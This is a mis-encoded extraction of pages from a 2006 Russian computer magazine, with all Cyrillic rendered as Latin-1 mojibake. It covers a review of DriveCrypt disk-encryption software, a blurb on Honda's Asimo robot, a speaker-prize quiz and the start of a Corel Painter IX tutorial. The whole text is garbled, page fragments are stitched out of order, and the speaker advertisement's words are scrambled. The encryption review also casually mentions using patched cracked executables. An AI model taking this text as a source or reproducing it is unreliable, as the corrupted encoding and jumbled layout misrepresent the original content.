XÀÊÅÐ 01 /85/ 06


âîçìîæíî, â swap. È íè÷åãî ñ ýòèì íå ïîäåëàåøü. Ðàçâå ÷òî îòêëþ÷èøü ôàéë ïîäêà÷êè (Ñâîéñòâà «Ìîåãî êîìïüþòåðà» !Äîïîëíèòåëüíî ! Ïàðàìåòðû áûñòðîäåéñòâèÿ ! Äîïîëíèòåëüíî ! Èçìåíèòü ! Áåç ôàéëà ïîäêà÷êè). Âòîðîå çëî — æäóùèé ðåæèì (Hibernation Mode). Êîãäà êîìïüþòåð óõîäèò â ñïÿ÷êó, ñîäåðæèìîå åãî îïåðàòèâíîé ïàìÿòè, ðåãèñòðîâ ïðîöåññîðà è ò.ä. ñîõðàíÿåòñÿ â ñïåöèàëüíûé

Íàñòîÿùèé ìîíñòð, ïîääåðæèâàþùèé 1344-áèòíîå øèôðîâàíèå æåñòêîãî äèñêà. Îñíîâíîé çàäà÷åé, êîíå÷íî æå, ÿâëÿåòñÿ ñîçäàíèå è îáñëóæèâàíèå çàøèôðîâàííûõ êîíòåéíåðîâ. Ñîçäàòü òàêîé íåñëîæíî: äîñòàòî÷íî âûáðàòü ìåíþ File -> Create Container file è îòâåòèòü ìàñòåðó I want to create a DriveCrypt container for my disk. Êàê îáû÷íî, ïðîãà ïîïðîñèò ââåñòè ïàðàìåòðû êîíòåéíåðà: åãî ðàçìåð, ôàéëîâóþ ñèñòåìó, ôèçè÷åñêîå ðàñïîëîæåíèå íà äèñêå. Øèôðîâàíèå êàæäûé ðàç îñóùåñòâëÿåòñÿ ïî-ðàçíîìó: äëÿ ýòîãî òðåáóåòñÿ íåêîòîðûé íàáîð ñëó÷àéíûõ ÷èñåë, êîòîðûé ãåíåðèðóåòñÿ çà ñ÷åò äâèæåíèé òâîåé ìûøè. Ïîñëå òîãî êàê íåîáõîäèìàÿ ïîñëåäîâàòåëüíîñòü áóäåò ñãåíåðèðîâàíà, DriveCrypt ïðåäëîæèò îïðåäåëèòüñÿ íåïîñðåäñòâåííî ñ àëãîðèòìîì øèôðîâàíèÿ. Áëàãî åñòü èç ÷åãî âûáèðàòü: ïîääåðæèâàþòñÿ AES, Blowfish, Tea 16, Tea 32, Des, Triple Des, Misty 1 è Square. Ïîñëå âûáîðà òîáîé ñõåìû øèôðîâàíèÿ, ñîçäàíèå êîíòåéíåðà áóäåò çàâåðøåíî. Ñàìîå âðåìÿ îðãàíèçîâàòü ñêðûòóþ ÷àñòü êîíòåéíåðà. Òóò íàäî ñêàçàòü, ÷òî ïðîäóìàííîñòü èíòåðôåéñà è îáùàÿ þçåáèëèòè DriveCrypt'à îñòàâëÿåò æåëàòü ëó÷øåãî. Åñëè â òîì æå TrueCrypt'å äëÿ ñîçäàíèÿ ñêðûòîãî ðàçäåëà äîñòàòî÷íî áûëî íàæàòü îäíó êíîïî÷êó è ðóêîâîäñòâîâàòüñÿ íàïóòñòâèÿìè ìàñòåðà, òî çäåñü òåáå ïðèäåòñÿ ñíà÷àëà ïðèìîíòèðîâàòü ñóùåñòâóþùèé êîíòåéíåð, çàòåì çàëåçòü â åãî ñâîéñòâà è óæå îòòóäà âûáðàòü ïóíêò Invisible disk creating. Ñïðàâåäëèâîñòè ðàäè çàìå÷ó, ÷òî äàëåå âñå èäåò êàê ïî ìàñëó.

ôàéë íà æåñòêîì äèñêå. Ñèñòåìû øèôðîâàíèÿ äàííûõ ýòîìó ïîìåøàòü íå ìîãóò. Âûâîä: èñïîëüçîâàòü æäóùèé ðåæèì âî âðåìÿ ðàáîòû ñ âàæíûìè äàííûìè íå ñòîèò. Òðåòüå çëî — ìíîãîïîëüçîâàòåëüñêèé ðåæèì. Åñëè òû ïðèìîíòèðîâàë ê ñèñòåìå êîíòåéíåð ñ çàøèôðîâàííûìè äàííûìè, òî îí ñòàíîâèòñÿ äîñòóïåí äëÿ âñåõ ïîëüçîâàòåëåé ñðàçó. ×òîáû èñêëþ÷èòü âîçìîæíîñòü äîñòóïà ê íåìó, íåîáõîäèìî èñïîëüçîâàòü ôàéëîâóþ ñèñòåìó NTFS è óñòàíàâëèâàòü íà ôàéëû è ïàïêè ñîîòâåòñòâóþùèå ïðàâà äîñòóïà.

Ïðèìå÷àòåëüíî, ÷òî DriveCrypt ïîçâîëÿåò îðãàíèçîâàòü ñîâìåñòíûé äîñòóï ê çàøèôðîâàííûì äàííûì î÷åíü ïðîäóìàíî è óäîáíî. ×òîáû ïðåäîñòàâèòü äîñòóï ê êîíòåéíåðó äðóãîìó ëèöó, íåîáõîäèìî ñîçäàòü äëÿ íåãî âðåìåííûé DKF-êëþ÷ (ìåíþ File -> Create DKF Access File). Íà èñïîëüçîâàíèå êëþ÷à ìîæíî íàëîæèòü ðàçëè÷íûå îãðàíè÷åíèÿ: êîëè÷åñòâî äíåé, êîòîðûå îí áóäåò äåéñòâèòåëåí, âðåìåííûå ðàìêè (íàïðèìåð, òîëüêî íî÷üþ) è ò.ä. Ïî çàâåðøåíèþ ðàáîòû ñïåöèàëüíîãî ìàñòåðà ïîëó÷èòñÿ íåáîëüøîé DKF-ôàéë, êîòîðûé íåîáõîäèìî îòäàòü ïîëüçîâàòåëþ, çàîäíî ñîîáùèâ ïàðîëü, êîòîðûé áûë íà íåãî óñòàíîâëåí. Ýòîò êëþ÷ ìîæíî õðàíèòü, ãäå óãîäíî, îäíàêî äåéñòâèòåëüíûì îí áóäåò òîëüêî íà òîé ìàøèíå, ãäå áûë ñîçäàí. Áîëåå òîãî, ñ ïîìîùüþ DKFêëþ÷à äîñòóï âîçìîæåí èñêëþ÷èòåëüíî ê ñîäåðæèìîìó êîíòåéíåðó, â òî âðåìÿ êàê âñå íàñòðîéêè è îïöèè (â òîì ÷èñëå âîçìîæíîñòü ñîçäàíèÿ åùå îäíîãî êëþ÷à) áóäóò çàáëîêèðîâàíû. DriveCrypt ïîääåðæèâàåò ñòåíîãðàôèþ è ìîæåò ðàçìåñòèòü îñîáî êîíôèäåíöèàëüíûå äàííûå âíóòðè 16áèòíûõ WAV-ôàéëîâ. ×òîáû ñîçäàòü òàêèå ôàéëû, ïîíàäîáÿòñÿ ìóëüòèìåäèà-êîíâåðòåð, òàêîé êàê WinDac èëè Cool Edit (èõ ðåêîìåíäóþò ðàçðàáîò÷èêè, ïîýòîìó îíè äîñòóïíû äëÿ çàêà÷êè ñ îôèöèàëüíîãî ñàéòà ïðîãðàììû). Ñóùåñòâóåò òàêæå äðóãàÿ âåðñèÿ ïðîãðàììû — DriveCrypt Plus Pack, êîòîðàÿ, íåñìîòðÿ íà ñõîæåå íàçâàíèå, ÿâëÿåòñÿ âïîëíå ñàìîñòîÿòåëüíî ðàçðàáîòêîé. Ýòî ñðåäñòâî ïî ïðàâó ìîæíî ïîðåêîìåíäîâàòü ïàðàíîèêàì,

Åñòåñòâåííî, êðèïòîãðàôè÷åñêèõ ñèñòåìû íå äàþò 100% ãàðàíòèè êîíôèäåíöèàëüíîñòè äàííûõ. Íàïðèìåð, òû ìîæåøü ïîïðîñòó çàáûòü îòêëþ÷èòü çàøèôðîâàííûé êîíòåéíåð îò ñèñòåìû è îòëó÷èòüñÿ îò êîìïà. Ñàì ïîíèìàåøü, ÷òî â ýòîì ñëó÷àå ñêîïèðîâàòü ôàéëû ñìîæåò ëþáîé æåëàþùèé.

È âñå-òàêè íå èñïîëüçîâàòü îäíó èç ýòèõ ïðîãðàìì, îñîáåííî êîãäà èìååøü äåëî ñ êîìïðîìåòèðóþùèìè äàííûìè è óòèëèòàìè, — ãëóïî. Òàê ÷òî íå äåëàé ãëóïîñòè. :)

 Èíòåðíåòå íåìàëî ñëóõîâ î òîì, ÷òî ëþáîé êîíòåéíåð ëåãêî âçëàìûâàåòñÿ ñïåöñëóæáàìè. Âåðèòü â ýòî èëè íåò - ëè÷íîå äåëî êàæäîãî. ß íå âåðþ, íî ìíå è ñêðûâàòü íå÷åãî :).

XÀÊÅÐ 01 /85/ 06

è îíè íàâåðíÿêà îñòàíóòñÿ äîâîëüíû. DriveCrypt Plus Pack íå ñîçäàåò êîíòåéíåðû äëÿ õðàíåíèÿ äàííûõ, îíà øèôðóåò âèíò ïîëíîñòüþ íà ñàìîì íèçêîì óðîâíå! À ýòî ïîçâîëÿåò ñêðûòü íå òîëüêî âàæíûå äàííûå, íî è âñå îñòàëüíîå ñîäåðæèìîå äèñêà èëè ðàçäåëà, âêëþ÷àÿ îïåðàöèîííóþ ñèñòåìó. Ïàðîëü çàïðàøèâàåòñÿ âî âðåìÿ çàãðóçêè êîìïüþòåðà, ïðè ýòîì ó ïîëüçîâàòåëÿ åñòü íåñêîëüêî ïîïûòîê äëÿ ââîäà. Åñëè ñèñòåìà ïîéìåò, ÷òî èìååò äåëî ñ ïîñòîðîííèì ÷åëîâåêîì (íåñêîëüêî ðàç áûë ââåäåí íåïðàâèëüíûé ïàðîëü), òî îíà âïîëíå ìîæåò çàãðóçèòü ëîæíóþ ñèñòåìó, ïðè ðàáîòå ñ êîòîðîé áóäóò óíè÷òîæàòüñÿ äàííûå îñíîâíîé ñèñòåìû. Ìàðàçìàòè÷íî, íî ïîïðîáîâàòü ñòîèò. Âåðäèêò: øàðîâàðíîñòü ïðîãðàììû — ãëàâíûé åå ìèíóñ. Ïàðó ëåò íàçàä â Ñåòè àêòèâíî ðàñïðîñòðàíÿëñÿ ñëóõ î òîì, ÷òî â ïðîãðàììå óñòàíîâëåí òðîÿí äëÿ ñïåöñëóæá. Ðàçðàáîò÷èêè, åñòåñòâåííî, ýòîò ôàêò îòðèöàëè, íî âåðèòü èì íàâåðíÿêà íåëüçÿ, òàê êàê èñõîäíèêè ïðîãðàììû íèêòî è íèêîãäà íå èçó÷àë, êðîìå íèõ. Áîëåå òîãî, ïðîãðàììà äîñòàòî÷íî õîðîøî çàùèùåíà îò âçëîìà. Äîáðîòíîé êëþ÷èäåëêè íå íàéòè, ïîýòîìó ïðèõîäèòñÿ èñêàòü ïðîïàò÷åííûå ýêçåøíèêè, êîòîðûå òàêæå ìîãóò ñîäåðæàòü ìíîãî íåõîðîøèõ âåùåé. À â öåëîì ïðîãðàììà ñòîÿùàÿ è èìååò íåñêîëüêî óíèêàëüíûõ ôèøåê (íàïðèìåð, ñîçäàíèå âðåìåííûõ êëþ÷åé).

DRIVECRYPT 4.2 WWW.SECURSTAR.COM 3,05 ÌÁ, SHAREWARE

ÏÐÎÃÐÀÌÌÛ

ÂÑÅ Â ÒÂÎÈÕ ÐÓÊÀÕ

BINARY YOUR’S z

Åñëè íàäóìàåøü øèôðîâàòü öåëûé ðàçäåë, òî ïîçàáîòüñÿ î áýêàïå õðàíèìûõ íà íåì äàííûõ. Íàïðèìåð, TrueCrypt ñ ÷èñòîé ñîâåñòüþ ñîòðåò íà íåì âñå ôàéëû, ïåðåçàïèñàâ èõ ñëó÷àéíûìè êîìáèíàöèÿìè ñèìâîëîâ. È áóäåò ïðàâ.

039


ÕÀÊÅÐ ÐÀÑÑÊÀÇÛÂÀÅÒ ///// ISSUE

Asimo

Ðîáîò Asimo áûë ñîçäàí 5 ëåò íàçàä êîìïàíèåé Honda è ñ òåõ ïîð î÷åíü áûñòðî ðàçâèâàåòñÿ. Ñåãîäíÿ îí âåñèò 54 êèëîãðàììà, à ðîñòî÷êîì íå âûøå ñðåäíåãî êèòàéöà: 130 ñàíòèìåòðîâ. Ïî íàòóðå ðîáîò î÷åíü äîáðîæåëàòåëüíûé: îí óìååò óçíàâàòü çíàêîìûõ åìó ëþäåé è ïðèâåòñòâîâàòü èõ. Åñëè íàäî, ðîáîò ìîæåò íåæíî âçÿòü ÷åëîâåêà çà ðóêó è ïðîãóëÿòüñÿ ðÿäîì ñ íèì. Åñëè ìàõíóòü åìó â ñòîðîíó êîôåâàðêè, Asimo ñ óäîâîëüñòâèåì ñãîíÿåò çà êîôå è ìîæåò äàæå ïðèêàòèòü öåëóþ òåëåæêó ñ åäîé, à ïîòîì è ïîääåðæàòü ðàçãîâîð, ðàññêàçàâ î ïðåâðàòíîñòÿõ ïîãîäû. Äâà òàêèõ ðîáîòà ìîãóò çàïðîñòî ñûãðàòü â ôóòáîë è óïðàâèòüñÿ ñ ïûëåñîñîì. Honda íå òåøèò ñåáÿ íàäåæäàìè îêóïèòü â áëèæàéøåå âðåìÿ ðàñõîäû 160k íà ñîçäàíèå ðîáîòà. Ïîêà Asimo ìîæíî òîëüêî âçÿòü â àðåíäó: çà $1 â ãîä ýòîò êðàñàâåö êàê ñëåäóåò ðàçâëå÷åò ðàáîòíèêîâ ôèðìû è êëèåíòîâ. Honda èñïîëüçóåò åãî äëÿ ïðîäâèæåíèÿ ñâîåãî áðåíäà è àâòîìîáèëåé, â IBM îí ðàáîòàåò ñåêðåòàðåì. Ëåò ÷åðåç ïÿòü ïëàíèðóåòñÿ, ÷òî òàêèå ðîáîòû ñìîãóò ðàáîòàòü ïðèñëóãîé â îáûêíîâåííûõ äîìàõ.

Âåñ: 54 êèëîãðàììà Ðîñò: 130 ñàíòèìåòðîâ Áåãàåò ñî ñêîðîñòüþ 6 êì/÷àñ Ïðîãóëî÷íàÿ ñêîðîñòü: 2,7 êì/÷àñ Ìîæåò íîñèòüñÿ ïî êðóãó ðàäèóñîì 2,5 ìåòðà ñî ñêîðîñòüþ 5 êì/÷àñ

040

XÀÊÅÐ 01 /85/ 06


ûì, Ìîùíàÿ ñèñòåìà ñ íåîðäèíàðí çàùèòíûõ êðàñèâûì çâó÷àíèåì. Îòñóòñòâèå âûñîêèõ ñåòîê óëó÷øàåò âîñïðîèçâåäåíèå ì ãèáêîì ÷àñòîò. Äèíàìèêè íà ñïåöèàëüíî ïîäâåñå îáåñïå÷èâàþò îñîáåííî ÷íàÿ êà÷åñòâåííûé, áûñòðûé áàñ. Îòëè ñèñòåìà äëÿ ìóçûêè, èãð è êèíî. èçâåäåíèÿ ÿ äëÿ âîñïðî åò Ðàçðàáîòàííà 330 èñïîëüçó EC , êè çû ìó æíûå ñåðüåçíîé ÿ Hi-Fi: áóìà íè øå ðå ûå íî òðàäèöèîíí èòåð è ðåêîðä òêàíåâûé òâ ûõ äèôôóçîðû, åíü íåëèíåéí îâ óð ñå àñ êë íèçêèé â èñêàæåíèé.

Ìîäèô èêàöèÿ êîìïëå óêîìïë êòà AVE åêòîâàí C210, íàÿ ïîë (èëè, ñê î÷íûìè îðåå, “ò òûëîâû óìáî÷í ìè êîë ûìè”) îíêàìè ìîäåëü, . Êàê è 210-ÿ ñíàáæå íà ìîù ñàáâóô íûì åðîì è î÷åíü õî ñïðàâë ÿåòñÿ ñ ðîøî êèíîýô ôåêòàì è.

1 ìåñòî EC-330 260 ó.å.

2 ìåñòî Ñ200 250 ó.å.

3 ìåñòî D60 80 ó.å.

Ó ÒÅÁß ÅÑÒÜ ÂÎÇÌÎÆÍÎÑÒÜ ÂÛÈÃÐÀÒÜ ÊËÀÑÑÍÛÅ ÊÎËÎÍÊÈ ÎÒ AVE! ÒÅÁÅ ÍÅ ÍÀÄÎ ÍÈÊÓÄÀ ÅÕÀÒÜ, ÍÅ ÍÀÄÎ ÏÐÈÄÓÌÛÂÀÒÜ ÂÅËÎÑÈÏÅÄ. ÏÐÎÑÒÎ ÎÒÂÅÒÜ ÍÀ ÍÅÑÊÎËÜÊÎ ÂÎÏÐÎÑÎÂ È ÏÅÐÂÛÅ ÒÐÎÅ ÑÀÌÛÕ ÁÛÑÒÐÛÕ ÏÎËÓ×ÀÒ ÏÐÈÇ: ÊÒÎ ÑÒÎßË Ó ÈÑÒÎÊÀ ÑÎÇÄÀÍÈß ÏÅÐÂÎÃÎ ÄÈÍÀÌÈÊÀ  ÌÈÐÅ? 1) Jensen 2) AVE 3) coolSound 4) microlab ×ÒÎ ÒÀÊÎÅ ÄÅÖÈÁÅË? 1) ×òî-òî î÷åíü ñëîæíîå 2) Îòíîñèòåëüíàÿ ëîãàðèôìè÷åñêàÿ åäèíèöà èçìåðåíèÿ âåëè÷èí, ñâÿçàííûõ ñ èíòåíñèâíîñòüþ çâóêà 3) Êà÷åñòâî çâóêà

×ÒÎ ÒÀÊÎÅ ÑÀÁÂÓÔÅÐ? 1) Èñòî÷íèê íèçêî÷àñòîòíîãî çâóêà 2) Èñòî÷íèê ðàäèîñèãíàëà 3) Çâóêîâîé ïðîèãðûâàòåëü ÑÀÌÛÉ ÏÎÏÓËßÐÍÛÉ ÔÎÐÌÀÒ ÔÀÉËÀ ÄËß ÕÐÀÍÅÍÈß ÌÓÇÛÊÀËÜÍÛÕ ÊÎÌÏÎÇÈÖÈÉ? 1) WAV 2) OGG 3) MP3 4) WMA

* ÏÐÈÑÛËÀÉ ÎÒÂÅÒÛ ÍÀ ÂÎÏÐÎÑÛ ÏÎ ÀÄÐÅÑÓ AVE@REAL.XAKEP.RU


ÄÈÇÀÉÍ ÂÇËÎÌ ÄÈÇÀÉÍ///// /////ISSUE ISSUE

042

XÀÊÅÐ 01 /85/ 06


TEXT ÎËÅÃ ÒÈÙÅÍÊÎÂ / http://olegti.design.ru / Èëëþñòðàòîð ñòóäèè Ëåáåäåâà

ÐÈÑÓÅÌ Â PAINTER IX ÝÒÎÒ ÐÀÑÑÊÀÇ Î ÅÄÈÍÑÒÂÅÍÍÎÌ ÏÐÎÔÅÑÑÈÎÍÀËÜÍÎÌ ÈÍÑÒÐÓÌÅÍÒÅ ÄËß “ ÖÈÔÐÎÂÛÕ ÕÓÄÎÆÍÈÊÎÂ.  ÎÒËÈ×ÈÅ ÎÒ ÂÑÅÍÀÐÎÄÍÎ ÏÐÈÇÍÀÍÍÎÃÎ ÃÐÀÔÈ×ÅÑÊÎÃÎ ÐÅÄÀÊÒÎÐÀ ADOBE PHOTOSHOP, ÊÎÒÎÐÛÉ ÏÐÅÄÍÀÇÍÀ×ÅÍ ÄËß ÎÁÐÀÁÎÒÊÈ È ÊÎËËÀÆÈÐÎÂÀÍÈß ÈÇÎÁÐÀÆÅÍÈÉ, PAINTER  ÏÅÐÂÓÞ Î×ÅÐÅÄÜ ÈÑÏÎËÜÇÓÅÒÑß ÄËß ÑÎÇÄÀÍÈß ÈÇÎÁÐÀÆÅÍÈÉ «Ñ ÍÓËß». ÏÐÈ ÝÒÎÌ ÎÍ ÍÀÄÅËÅÍ ÏÐÀÊÒÈ×ÅÑÊÈ

ÂÑÅÌÈ ÔÓÍÊÖÈßÌÈ ÎÁÐÀÁÎÒÊÈ, ÊÎÒÎÐÛÌÈ ÎÁËÀÄÀÅÒ ÐÅÄÀÊÒÎÐ PHOTOSHOP Ñðàçó õîòåëîñü áû óòî÷íèòü, ÷òî íèêòî íå ñòàâèò ñåáå öåëüþ âûÿñíèòü, êàêàÿ èç ïðîãðàìì ëó÷øå, ïîçâîëèâ ÷èòàòåëÿì ñàìîñòîÿòåëüíî ñîïîñòàâèòü ýòè ïàêåòû, îáúåêòèâíî îöåíèâ âîçìîæíîñòè Painter’à è Photoshop’à äëÿ âûïîëíåíèÿ ðàçëè÷íûõ çàäà÷. Îäíàêî äëÿ òîãî ÷òîáû ñîñòàâèòü ñîáñòâåííîå ìíåíèå, íåäîñòàòî÷íî ïðî÷èòàòü ýòó ñòàòüþ èëè äàæå çàó÷èòü åå ñàìûå èíòåðåñíûå ìîìåíòû íàèçóñòü. Äëÿ òîãî ÷òîáû ìíåíèå áûëî ïî-íàñòîÿùåìó îáúåêòèâíûì, Painter íåîáõîäèìî «ïîäåðæàòü» â ðóêàõ. Äëÿ íà÷àëà ìîæíî îãðàíè÷èòüñÿ trial-âåðñèåé, ñêà÷àâ åå ñ ñàéòà www.corel.com. Åñëè â íàëè÷èè èìååòñÿ ãðàôè÷åñêèé ïëàíøåò

XÀÊÅÐ 01 /85/ 06

Wacom Intuos, òî äåëî îáñòîèò åùå ïðîùå: âåðîÿòíîñòü íàéòè îáëåã÷åííóþ âåðñèþ Painter íà ïðèëàãàþùèõñÿ ê íåìó êîìïàêò-äèñêàõ î÷åíü âåëèêà. Êñòàòè, ðàç óæ ðå÷ü çàøëà î ïëàíøåòàõ, ñòîèò ñðàçó ñêàçàòü, ÷òî áåç ãðàôè÷åñêîãî ïëàíøåòà îòêðûâàòü Painter ïðàêòè÷åñêè íå èìååò ñìûñëà, ïîñêîëüêó ïðè ðàáîòå îáûêíîâåííîé ìûøüþ òåðÿåòñÿ 80% âîçìîæíîñòåé, ôóíêöèîíàëüíîñòè è óäîáñòâà ýòîãî ïàêåòà.  ýòîì óðîêå ìû ðàññìîòðèì ïðîöåññ ðèñîâàíèÿ êàðòèíêè â ñòèëå Dark Fantasy, êîììåíòèðóÿ íåêîòîðûå èç âîçìîæíîñòåé è îñîBINARY YOUR’S z áåííîñòåé ïðîãðàììû Painter.

043


ÄÈÇÀÉÍ ///// ISSUE

01

ÑÊÀÍÈÐÓÅÌ ÝÑÊÈÇ

Ìíîãèå öèôðîâûå õóäîæíèêè äàâíî îòêàçàëèñü îò òðàäèöèîííûõ ñðåäñòâ èçîáðàæåíèÿ, îíè ñðàçó íà÷èíàþò ðèñîâàòü ýñêèçû íà êîìïüþòåðå. Ìíå æå èíòåðåñíåå è óäîáíåå íà÷èíàòü ñ êàðàíäàøà è áóìàãè, ïîñëå ÷åãî ñêàíèðîâàòü èçîáðàæåíèå. Íà äèñêå ñêàí ìîåãî ðèñóíêà íàçûâàåòñÿ 01.jpg, åãî ìû îòêðûâàåì â Painter.

03

02

ÐÀÇÌÅÐÛ/ÔÎÐÌÀÒÛ

Óâåëè÷èâàåì èëè óìåíüøàåì êàðòèíêó äî íåîáõîäèìîãî íàì ðàçìåðà. Êàê ïðàâèëî, ÿ ðàáîòàþ «ñ çàïàñîì»: ðàáî÷åå èçîáðàæåíèå ñïåöèàëüíî óâåëè÷èâàþ íà 20—30%, ÷òîáû ÷åò÷å ïðîðàáàòûâàòü äåòàëè. Ñîõðàíèì ôàéë â ôîðìàòå PSD. Íåîáõîäèìî îòäàâàòü ñåáå îò÷åò â òîì, ÷òî äàëåêî íå íà âñåõ êîìïüþòåðàõ ñòîèò Painter, è ïîýòîìó ñîáñòâåííûé ôîðìàò ïðîãðàììû RIFF ìîæíî áóäåò îòêðûòü íå íà âñåõ ìàøèíàõ. Òàêæå ñîâìåñòèìîñòü ôîðìàòà PSD ïîçâîëèò ñîõðàíèòü ãðóïïû è íàçâàíèÿ ñëîåâ. Ïðàâäà, áóäåì ãîòîâû ê òîìó, ÷òî íåêîòîðûå ñïåöèôè÷åñêèå îñîáåííîñòè ñëîåâ Painter íå âñåãäà áóäóò èíòåðïðåòèðîâàòüñÿ äðóãèìè ïðîãðàììàìè êîððåêòíî.

04

ÐÈÑÓÍÎÊ

Êàê ýòî ÷àñòî áûâàåò, îòñêàíèðîâàííûé ñêåò÷ ïðè óâåëè÷åíèè êàæåòñÿ åùå ìåíåå ñîâåðøåííûì, ÷åì îí áûë íà áóìàãå, ïîýòîìó ïåðâûì äåëîì ïðîðàáîòàåì äåòàëè ðèñóíêà. Òåì áîëåå ÷òî â ãîëîâå óæå ïîÿâëÿþòñÿ íîâûå èäåè, êîòîðûå òàê è ïðîñÿòñÿ íà ëèñò. Ðàáîòàòü áóäåì èíñòðóìåíòîì Dons Marker.

05

ÖÂÅÒÎÂÛÅ ÏßÒÍÀ

Ñëåäóþùèé øàã — âûáîð öâåòîâîãî ðåøåíèÿ. Ýòîò ðèñóíîê ÿ õîòåë âûïîëíèòü â äîñòàòî÷íî ñäåðæàííîé öâåòîâîé ãàììå, òàê êàê ïðîñòîå «ðàçóêðàøèâàíèå» íå ïðèíåñëî áû æåëàåìûõ ðåçóëüòàòîâ.

ÏÀËÈÒÐÀ MIXER

ß èçíà÷àëüíî íå ñîáèðàëñÿ ðàáîòàòü òîëüêî â òåïëûõ ñåðûõ òîíàõ. Ñîîòâåòñòâåííî, íà ïàëèòðó Mixer ÿ âûíåñ íåñêîëüêî êëþ÷åâûõ öâåòîâ. Íà íåé ìîæíî ñìåøèâàòü âûáðàííûå êðàñêè, äîáèâàÿñü íåîáõîäèìûõ õîëîäíûõ è òåïëûõ îòòåíêîâ, êàê ýòî äåëàþò îáûêíîâåííûå õóäîæíèêè íà ñâîèõ ïàëèòðàõ. Òå, êîìó ïðèõîäèëîñü äîñòèãàòü ïîäîáíîãî ýôôåêòà äðóãèìè öèôðîâûìè ñðåäñòâàìè, íàâåðíÿêà îöåíÿò óäîáñòâî ïàëèòðû Mixer ïî äîñòîèíñòâó.

06

ÐÀÁÎ×ÅÅ Ï ÐÎÑÒÐÀÍÑÒÂÎ

Êàê ïðàâèëî, ïðè ðàáîòå ñ áîëüøèìè èçîáðàæåíèÿìè íà îãðàíè÷åííîì ïðîñòðàíñòâå ìîíèòîðà ïîñòåïåííî íà÷èíàåò ìåøàòü âñå!  òîì ÷èñëå äàæå î÷åíü íóæíûå ïàëèòðû. Îäíàêî äëÿ ðàçðåøåíèÿ ýòîé òðóäíîñòè äîñòàòî÷íî âûáðàòü íåîáõîäèìûé èíñòðóìåíò è ïðèñâîèòü ëþáîé êíîïêå íà ïëàíøåòå ñâîéñòâà Tab (Window > Show/Hide Palettes). Âïðî÷åì, ïðè îòñóòñòâèè ïëàíøåòà äëÿ äîñòèæåíèÿ òîãî æå ñàìîãî ýôôåêòà ìîæíî íàæèìàòü êëàâèøó <Tab> íà êëàâèàòóðå.

ÑÎÇÄÀÍÈÅ ÑÎÁÑÒÂÅÍÍÎÉ ÁÈÁËÈÎÒÅÊÈ ÒÅÊÑÒÓÐ Î÷åíü ÷àñòî ïðè ðàáîòå ñ «ðûõëûìè» ìàòåðèàëàìè (òèïà ìåëà èëè ïàñòåëè) äëÿ âîïëîùåíèÿ òâîð÷åñêîãî çàìûñëà òðåáóþòñÿ îñîáåííûå òåêñòóðû áóìàãè. Ó Painter’à èìååòñÿ ñîáñòâåííûé êîìïëåêò òåêñòóð, íî èíîãäà áûâàþò ñèòóàöèè, êîãäà òåêñòóðû, èìåþùèåñÿ â ñòàíäàðòíîì íàáîðå, íå ïîäõîäÿò.  òàêîì ñëó÷àå âñåãäà îñòàåòñÿ âîçìîæíîñòü ñîçäàòü ñîáñòâåííóþ òåêñòóðó èç ôîòîãðàôèè ëèáî íàðèñîâàòü åå ñàìîñ-

044

XÀÊÅÐ 08 /80/ 06


07

08

ÈÍÑÒÐÓÌÅÍÒÛ

 àðñåíàëå Painter èìååòñÿ â îáùåé ñëîæíîñòè îêîëî 200 ðàçíûõ íàñòðîåê èíñòðóìåíòîâ, è áûëî áû íåëåïî ïðåäïîëîæèòü, ÷òî ïîëüçîâàòåëü êàæäûé ðàç ïðè ñìåíå èíñòðóìåíòà áóäåò äåðæàòü â ãîëîâå, ãäå íàõîäÿòñÿ âñå îñòàëüíûå, ñ êîòîðûìè îí ðàáîòàåò íàä äàííîé ðàáîòîé. Äëÿ òîãî ÷òîáû íóæíûå èíñòðóìåíòû áûëè âñåãäà ïîä ðóêîé, äîñòàòî÷íî ïîäöåïèòü óæå íàñòðîåííûé èíñòðóìåíò ìûøüþ è ïåðåòàùèòü åãî íà ðàáî÷åå ïîëå: íà ýêðàíå òóò æå ïîÿâèòñÿ ïàëèòðà èçáðàííûõ èíñòðóìåíòîâ Custom Palette.  äàëüíåéøåì â íåå ìîæíî äîáàâëÿòü íîâûå èíñòðóìåíòû. Èñõîäÿ èç ñîáñòâåííîãî îïûòà, ìîãó ñêàçàòü, ÷òî óäîáíåå âñåãî èìåòü ñðàçó íåñêîëüêî òàêèõ ïàëèòð äëÿ ðàçíûõ òåõíèê ðèñîâàíèÿ.

09

11

ÐÀÑÒÓØÅÂÊÀ

Ðàñòóøåâêîé íàçûâàåòñÿ ïðîöåññ ñìåøèâàíèÿ ñîñåäíèõ íà ðèñóíêå öâåòîâ. Åñëè ïðàâèëüíî ïðåäñòàâëÿòü ñåáå îáúåì ðèñóåìûõ îáúåêòîâ, òî òàêèì íåõèòðûì ñïîñîáîì ìîæíî ýôôåêòèâíî äîñòè÷ü ðåàëèñòè÷íîñòè â ïåðåäà÷å ôîðì. Äëÿ ýòîãî ïðèåìà â èíñòðóìåíòàðèè Painter èìååòñÿ öåëûé ðÿä ñðåäñòâ. Îäíàêî ïðèõîäèòñÿ ïðèçíàòü, ÷òî êà÷åñòâî âñòðîåííûõ èíñòðóìåíòîâ íå âñåãäà ñîîòâåòñòâóåò òîìó, êîòîðîå õîòåëîñü áû âèäåòü â ñâîåé ðàáîòå.

10

ÇÀËÈÂÊÈ

Ñëåäóþùèì ýòàïîì áóäåò çàêðàøèâàíèå îáúåêòîâ öâåòîì. Ïðè ýòîì íåîáõîäèìî ó÷èòûâàòü îáùóþ îñâåùåííîñòü ñöåíû è íàïðàâëåíèå ïàäåíèÿ ñâåòà. Ýòî âàæíî äëÿ ñîçäàíèÿ ïðàâäîïîäîáíûõ áëèêîâ è òåíåé.

È ÑÍÎÂÀ ÐÀÑÒÓØÅÂÊÀ

Êàê ïðàâèëî, îäíîãî ïðîõîäà èíñòðóìåíòîì Blender áûâàåò íåäîñòàòî÷íî, ðåæå ìîæíî îáîéòèñü äâóìÿ, íî ÷àùå èõ òðåáóåòñÿ áîëüøå. Ñ êàæäûì ðàçîì ìû ðàáîòàåì ñ èíñòðóìåíòîì âñå ìåíüøåãî è ìåíüøåãî äèàìåòðà.

ÑÎÇÄÀÍÈÅ È ÐÅÄÀÊÒÈÐÎÂÀÍÈÅ ÊÈÑÒÅÉ

Âûáèðàåì Window > Show Brush Creator, ÷òîáû îòêðûòü ïàëèòðó ñîçäàíèÿ êèñòåé. Íåèñêóøåííîìó ïîëüçîâàòåëþ êîëè÷åñòâî íàñòðîåê êèñòè, íàâåðíÿêà ïîêàæåòñÿ ïóãàþùèì è ñëîæíûì.

12

ÄÅÒÀËÈ

